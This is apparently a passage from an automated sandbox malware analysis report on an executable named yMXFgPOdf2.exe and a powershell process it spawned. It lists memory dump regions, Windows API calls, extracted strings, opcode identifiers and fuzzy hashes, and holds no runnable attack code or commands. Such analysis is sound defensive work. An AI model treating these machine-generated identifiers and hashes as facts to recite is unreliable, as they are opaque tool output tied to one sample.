                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Free$GlobalLibrary
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 1100898210-1881609536
                                                                  • Opcode ID: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                                  • Instruction ID: 839bfc3724c17aac1dd4b1c492512fede4cfaa3ffa2183060c5e8c58424d678e
                                                                  • Opcode Fuzzy Hash: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                                  • Instruction Fuzzy Hash: 3AE0C233500020ABC6315F55FD0572EBB68AF4AB22F05842EE8807B3A087745C534FC8
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402DD3,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\yMXFgPOdf2.exe,C:\Users\user\Desktop\yMXFgPOdf2.exe,80000000,00000003,?,?,?,00000000,0040344F,?), ref: 0040583E
                                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DD3,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\yMXFgPOdf2.exe,C:\Users\user\Desktop\yMXFgPOdf2.exe,80000000,00000003,?,?,?,00000000,0040344F), ref: 0040584E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrlen
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 2709904686-4267323751
                                                                  • Opcode ID: e38c69dbf87290b844468336b4ce525dd485480a3148f7863e3f2b8cc78cabd0
                                                                  • Instruction ID: e3b64cc9c476cb1f3dcb5ec7b95522af912f2f782a9e9cda297630c48d1e24bd
                                                                  • Opcode Fuzzy Hash: e38c69dbf87290b844468336b4ce525dd485480a3148f7863e3f2b8cc78cabd0
                                                                  • Instruction Fuzzy Hash: 1ED05EB3401D209AD3127704DC449DF63A8EF62300746846FE940A21A0D7785C908EA9
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BAC,00000000,[Rename],00000000,00000000,00000000), ref: 00405982
                                                                  • lstrcmpiA.KERNEL32(00405BAC,00000000), ref: 0040599A
                                                                  • CharNextA.USER32(00405BAC,?,00000000,00405BAC,00000000,[Rename],00000000,00000000,00000000), ref: 004059AB
                                                                  • lstrlenA.KERNEL32(00405BAC,?,00000000,00405BAC,00000000,[Rename],00000000,00000000,00000000), ref: 004059B4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 190613189-0
                                                                  • Opcode ID: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                                  • Instruction ID: 74db543d3a7c556463c7df328d7f28d8c713d1c7c3b841aeb09eb3bbb428cad3
                                                                  • Opcode Fuzzy Hash: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                                  • Instruction Fuzzy Hash: F4F0F632205914FFD702DFA4CE0099FBBA8EF05364B2140B9E840FB210D674DE019FA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1828176902.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_4ea0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b8b2fc153a1b0e66ddb841b555a0b3098ca07b7533340c80dd001a2e0f7c6a2e
                                                                  • Instruction ID: 7aef1b16d872e483623562be7487493dc2e0dd0678d6121e9b65143a93e8c0fd
                                                                  • Opcode Fuzzy Hash: b8b2fc153a1b0e66ddb841b555a0b3098ca07b7533340c80dd001a2e0f7c6a2e
                                                                  • Instruction Fuzzy Hash: 004190397002059FDB15DB24D558AA9BBF2EF89754F089468E502EB7A0DB34EC41CB90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$4'_q$4'_q$4'_q$4sl$4sl$tLhk$tLhk$x.gk$x.gk$-gk
                                                                  • API String ID: 0-372042714
                                                                  • Opcode ID: e5c6ee5fcbd7b3c39d60207a69561de47264e00165fa16d8b32dc36e0f05d31d
                                                                  • Instruction ID: 935c7aa8128804b11645fb13b472f74d857b5dbc47230cd1478e6cd36061a803
                                                                  • Opcode Fuzzy Hash: e5c6ee5fcbd7b3c39d60207a69561de47264e00165fa16d8b32dc36e0f05d31d
                                                                  • Instruction Fuzzy Hash: D9D294B4A00215DFD724DF64C950BAABBB2BF85308F1084A9DA09AB754DB71ED81CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$4'_q$4'_q$4'_q$4'_q$tLhk$x.gk$-gk
                                                                  • API String ID: 0-3291921152
                                                                  • Opcode ID: c748972a4ef9eec7599cc0d2b9ad2b43e4ad9b75ba9bd982ef7b8e9a15c15ee3
                                                                  • Instruction ID: 304cb1234979bfb35982c437b220a67ca3099466ffca9c46197650a339d57634
                                                                  • Opcode Fuzzy Hash: c748972a4ef9eec7599cc0d2b9ad2b43e4ad9b75ba9bd982ef7b8e9a15c15ee3
                                                                  • Instruction Fuzzy Hash: 5B82B7B4A00215DFDB24DF58C951B9ABBB7AF84308F10C5A9DA0A6BB44CB31ED85CF51
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$4'_q$tLhk$tLhk$x.gk$-gk
                                                                  • API String ID: 0-2827335874
                                                                  • Opcode ID: acc0d865165e20b38ac80f9a2db0abf66ae2977aabfa490ead37320ff9d143fb
                                                                  • Instruction ID: 317320bf5b18601abd555015fa0876efec865ad7f5b9565b7b4a6b593f16e036
                                                                  • Opcode Fuzzy Hash: acc0d865165e20b38ac80f9a2db0abf66ae2977aabfa490ead37320ff9d143fb
                                                                  • Instruction Fuzzy Hash: 7082BAB4A00214DFDB24DF58C950BAAB7B7AF84308F50C5A9DA4A6BB44CB31ED85CF51
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$4'_q$tLhk$tLhk$x.gk$-gk
                                                                  • API String ID: 0-3768679174
                                                                  • Opcode ID: 2b0599da2e70a36a4d0bf7f36258e432a85a4ca796ec18420eb9efca8e8d3843
                                                                  • Instruction ID: 924203942cd6c21ae8e6536f2eb26526587026eff1a016deca58688f79d05939
                                                                  • Opcode Fuzzy Hash: 2b0599da2e70a36a4d0bf7f36258e432a85a4ca796ec18420eb9efca8e8d3843
                                                                  • Instruction Fuzzy Hash: AD7295B4B002149FC724DB64C950BAEBBB7AF85308F50C4A9D919AB784DB71ED81CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$4'_q$tLhk$x.gk$-gk
                                                                  • API String ID: 0-1465830196
                                                                  • Opcode ID: 906bc0ec055f7e4869ce585bf5a8ab72ffa3658266a4d1ea15c9bd3351729bc6
                                                                  • Instruction ID: d48252f9ba85dc2aeeb65bcb6c180d231cf087d178b7e6090085634884dae939
                                                                  • Opcode Fuzzy Hash: 906bc0ec055f7e4869ce585bf5a8ab72ffa3658266a4d1ea15c9bd3351729bc6
                                                                  • Instruction Fuzzy Hash: A47293B4A00215DFDB20DF58C951BAABBB7AF84308F10C5A9DA0A6B744CB71ED85CF51
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837554490.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9360000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fvl$(fvl$4'_q$4'_q$4'_q$4'_q$tP_q$tP_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q$$_q
                                                                  • API String ID: 0-794342750
                                                                  • Opcode ID: 31998ecd503604bff0b9c6c259223d2ad936f6be11d36b4a0d5262c1df00f80b
                                                                  • Instruction ID: 9096d307e488505e415e57f1a7754c28cb37bafa91a39e5c3c6a719698416ca4
                                                                  • Opcode Fuzzy Hash: 31998ecd503604bff0b9c6c259223d2ad936f6be11d36b4a0d5262c1df00f80b
                                                                  • Instruction Fuzzy Hash: B4321476B08205DFCB14CFA8C541A6ABBF6AF85310F24C06AE9059B769DB31DC45CFA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837554490.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9360000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'_q$4'_q$84tl$84tl$84tl$84tl$r$r$r$tP_q$tP_q$tP_q$tP_q$$_q$$_q$$_q
                                                                  • API String ID: 0-1982991128
                                                                  • Opcode ID: 4db31dd209012d64f7a0cbc8793780b37f9ae5bf6f418c5ece1c76424ec88369
                                                                  • Instruction ID: 85f992a0df305eec8552408c08f7b7054a4d310a79923354b24365bac8d479c5
                                                                  • Opcode Fuzzy Hash: 4db31dd209012d64f7a0cbc8793780b37f9ae5bf6f418c5ece1c76424ec88369
                                                                  • Instruction Fuzzy Hash: 9182F131B002099FCB159F69C554AAABBF6FF85310F14C4AAF9058B269DB31DC45CFA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$4'_q$tLhk$x.gk$-gk
                                                                  • API String ID: 0-232253691
                                                                  • Opcode ID: cbf0301fb76d3497ce69121700fdb727477ad8c64a2a642323257bdbd64e30e2
                                                                  • Instruction ID: a29bba1296bd6c34addcd90b5ec48778acc03d46352546d5f61700f25aa0c1b8
                                                                  • Opcode Fuzzy Hash: cbf0301fb76d3497ce69121700fdb727477ad8c64a2a642323257bdbd64e30e2
                                                                  • Instruction Fuzzy Hash: 4E5295B4A00214DFDB20DF64C951B9ABBB7BF84308F10C5A9DA4A6BB44CB71AD85CF51
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$4'_q$tLhk$x.gk$-gk
                                                                  • API String ID: 0-232253691
                                                                  • Opcode ID: 74c126d6942f0062c3cff08061cdb1dc66f66fd62a2403e100f7dba88bb7124d
                                                                  • Instruction ID: 46ba5797aa6500b966c9cd3b5f79b00f081162f4cdd211543354d5f44e68f9f1
                                                                  • Opcode Fuzzy Hash: 74c126d6942f0062c3cff08061cdb1dc66f66fd62a2403e100f7dba88bb7124d
                                                                  • Instruction Fuzzy Hash: 3642A5B4B002149FC724DB64C950BAABBB3BF85308F50C4A9DA196B785DB71ED81CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837554490.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9360000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 84tl$84tl$T|($T|($h2ik$h2ik$r$tP_q$tP_q
                                                                  • API String ID: 0-853106533
                                                                  • Opcode ID: 8f15d7514622fed7a61c418bc8246855fa1fdb3a860cdfc7ddb8ff9ffca90442
                                                                  • Instruction ID: 241f239521e8c06b6f74f2b4937c5bb17b8345d839574df51bc54258a75b22c2
                                                                  • Opcode Fuzzy Hash: 8f15d7514622fed7a61c418bc8246855fa1fdb3a860cdfc7ddb8ff9ffca90442
                                                                  • Instruction Fuzzy Hash: 4B92BE74B002049FCB14CFA8C951AAABBF2AF85304F15C069E915AF769CB71EC45CFA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fvl$(fvl$(fvl$(fvl$(fvl$4'_q$4sl$tLhk$x.gk
                                                                  • API String ID: 0-3513704852
                                                                  • Opcode ID: fd37360d2ab260a46c921395bc6f33d8d62f7ef1591c3014ab934e0064a0249d
                                                                  • Instruction ID: 46150be5ed8d4c7648a4dd1a091ad484deb392bdaa2d622c2600af72441b8cdf
                                                                  • Opcode Fuzzy Hash: fd37360d2ab260a46c921395bc6f33d8d62f7ef1591c3014ab934e0064a0249d
                                                                  • Instruction Fuzzy Hash: 8F126DB4A00215DFDB24CF24C950BA9B7B6BF45308F5084E9DA0AAB790DB71EE85CF51
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fvl$(fvl$4'_q$4'_q$4'_q$4'_q$x.gk$-gk
                                                                  • API String ID: 0-2052166865
                                                                  • Opcode ID: 35cc81b3eabf6da95a41e261cdf4d432c0dd2dedb2582724a74484335b9f357e
                                                                  • Instruction ID: 717773d593b2a676269513ffac31cf9365576e3220faf092672fdb3667f827ff
                                                                  • Opcode Fuzzy Hash: 35cc81b3eabf6da95a41e261cdf4d432c0dd2dedb2582724a74484335b9f357e
                                                                  • Instruction Fuzzy Hash: AEE1ADB4B00205AFCB58DF69C551F9EBBA2AF84308F20C469DA056F759CB71EC85CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fvl$4'_q$4'_q$x.gk$-gk
                                                                  • API String ID: 0-2025720230
                                                                  • Opcode ID: bdb284422cf319faf85904b918e42d398e94529309ce7e55ffe81ad6f3e34aa3
                                                                  • Instruction ID: f90f2f2a5f1b8b2ac2717aa369b89b91ae3c1b4385c9bb94401dbca6cb91e0c2
                                                                  • Opcode Fuzzy Hash: bdb284422cf319faf85904b918e42d398e94529309ce7e55ffe81ad6f3e34aa3
                                                                  • Instruction Fuzzy Hash: C6C18AB4A00205EFCB54DF68C940F9EBBB2AF88308F14C469DA056F755CB71E885CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'_q$4'_q$4'_q$4'_q
                                                                  • API String ID: 0-4157139909
                                                                  • Opcode ID: 58b8f3d77aacdc6ba761dc0afcea3dd58850546631c7bb77ca7da022e94fd853
                                                                  • Instruction ID: 8dbb164e0874267537e4f796426b591787e1252e0f3eaea35ce89cefde2ceee8
                                                                  • Opcode Fuzzy Hash: 58b8f3d77aacdc6ba761dc0afcea3dd58850546631c7bb77ca7da022e94fd853
                                                                  • Instruction Fuzzy Hash: 2B1278F27043528FCB158B7889117AE7BA6BF82318F1484BADA05CF652DB75CC45C7A2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837554490.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9360000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 84tl$r$tP_q
                                                                  • API String ID: 0-1772371729
                                                                  • Opcode ID: 0efff46e8e7ecbdeb20b1b2ff8b95c485c133db705247f246e9cddb85513df40
                                                                  • Instruction ID: f0e690208ea665cc7528a39c03ac3b3089ffd583b022c608cfcae03bd6233f0b
                                                                  • Opcode Fuzzy Hash: 0efff46e8e7ecbdeb20b1b2ff8b95c485c133db705247f246e9cddb85513df40
                                                                  • Instruction Fuzzy Hash: EA51A135608204DFCB24CE98C544AAAB7F5FF85360F15C965F9159B2A8D771ED40CF90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $_q$$_q$$_q
                                                                  • API String ID: 0-2441406858
                                                                  • Opcode ID: b31897ddc63bea3b7958864794a15510d9dcb64080b81040aa4ffbb3046772b6
                                                                  • Instruction ID: 9f8eeb620ca4dde523a153ce16b38d21bfc153af9d69a7708fb98ca7503ce7bb
                                                                  • Opcode Fuzzy Hash: b31897ddc63bea3b7958864794a15510d9dcb64080b81040aa4ffbb3046772b6
                                                                  • Instruction Fuzzy Hash: 80419CF6B002169BCB249F79C90166EFBF9AF84714B24843ACA15E7304DB39D910C7E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'_q$4'_q
                                                                  • API String ID: 0-531570531
                                                                  • Opcode ID: e4561f6004cb9f9135d184d5d2ea574f961b4614ede2c26555db63f975d73536
                                                                  • Instruction ID: 109d324563aa081c9927892d1e85b9c52481c0b32e9696b94325cf390e5ac954
                                                                  • Opcode Fuzzy Hash: e4561f6004cb9f9135d184d5d2ea574f961b4614ede2c26555db63f975d73536
                                                                  • Instruction Fuzzy Hash: 320292B4B012459FDB14CF68C540A9EBBB6EF85308F24C06AEA059F365CB72EC45CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $_q$$_q
                                                                  • API String ID: 0-458585787
                                                                  • Opcode ID: 14ab8fc7b51c8f1cf20bdba224bab801777c94138bdd3b8abc902c4bf8a0eebc
                                                                  • Instruction ID: bb31732b485ea0cca4092ec62947af85b5c165b0b5458ff9357c0f5c0aadd900
                                                                  • Opcode Fuzzy Hash: 14ab8fc7b51c8f1cf20bdba224bab801777c94138bdd3b8abc902c4bf8a0eebc
                                                                  • Instruction Fuzzy Hash: 98216BF6A04357DFCB119F68C9402AABFF8EF45624B2546A7CA18D7241E338D940C7E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'_q
                                                                  • API String ID: 0-2033115326
                                                                  • Opcode ID: 36ad41bfa0c69e00e5afaa6210e6eea147ef1e3071da0b3eb046d73a8ad70545
                                                                  • Instruction ID: a573e435ebbd83ab8724dd87a2a89aa829834451b42d83eb185d4f2e65e5f1f7
                                                                  • Opcode Fuzzy Hash: 36ad41bfa0c69e00e5afaa6210e6eea147ef1e3071da0b3eb046d73a8ad70545
                                                                  • Instruction Fuzzy Hash: 56F18FB4B012459FDB14CF58C540EAABBB6FF85318F24C05AEA05AB365C772EC45CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837554490.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9360000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fvl
                                                                  • API String ID: 0-905518172
                                                                  • Opcode ID: 39f7186c11faaaf057736c8027cc1dc028306b4891746358dd655f99c9c2d2ca
                                                                  • Instruction ID: 4be0318305d5f08bdd520743ab92f453320c10ad263b7b14dd4e29421f109589
                                                                  • Opcode Fuzzy Hash: 39f7186c11faaaf057736c8027cc1dc028306b4891746358dd655f99c9c2d2ca
                                                                  • Instruction Fuzzy Hash: 76918E75A04204DFCB14CF94C555EAABBF2AF89314F28C0A9E905AB769C732EC41CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837554490.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9360000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fvl
                                                                  • API String ID: 0-905518172
                                                                  • Opcode ID: 602dcccc55c3d94192e552c03bb863030f2110ad7377bd38b030cf3f8b60a799
                                                                  • Instruction ID: 8e0e3b184d3a143153146b4c84831130690e12f7b5b3f8d11f98b5a0da240c06
                                                                  • Opcode Fuzzy Hash: 602dcccc55c3d94192e552c03bb863030f2110ad7377bd38b030cf3f8b60a799
                                                                  • Instruction Fuzzy Hash: 3C815C75A04204DFCB14CF94C595E9ABBF2AF89314F28C169E904AB769C732EC41CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1837554490.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_9360000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'_q
                                                                  • API String ID: 0-2033115326
                                                                  • Opcode ID: 42a54967010290a6172dc156fe2014c5b49f7262d16ea078c7c82efa17a7a6a0
                                                                  • Instruction ID: 30255c8a0c425fb781b70f1e70f1c9731a00ddb7d90f3d461b06b48bcce9083c
                                                                  • Opcode Fuzzy Hash: 42a54967010290a6172dc156fe2014c5b49f7262d16ea078c7c82efa17a7a6a0
                                                                  • Instruction Fuzzy Hash: 15512971A0C3418FCB218FA5C45176A7BF1AF85310F19C0AAE915DB576D739C984CFA2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1834417816.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_79f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: x.gk
                                                                  • API String ID: 0-1304459573
                                                                  • Opcode ID: 0b4f2d22327271a3009d3174190311fb0b0d3d22dd03e31f4acdb57619947a67
                                                                  • Instruction ID: 9615581f07381729c333ca61c2a8ae585253091e53b3201ab20052f9d6942bd1
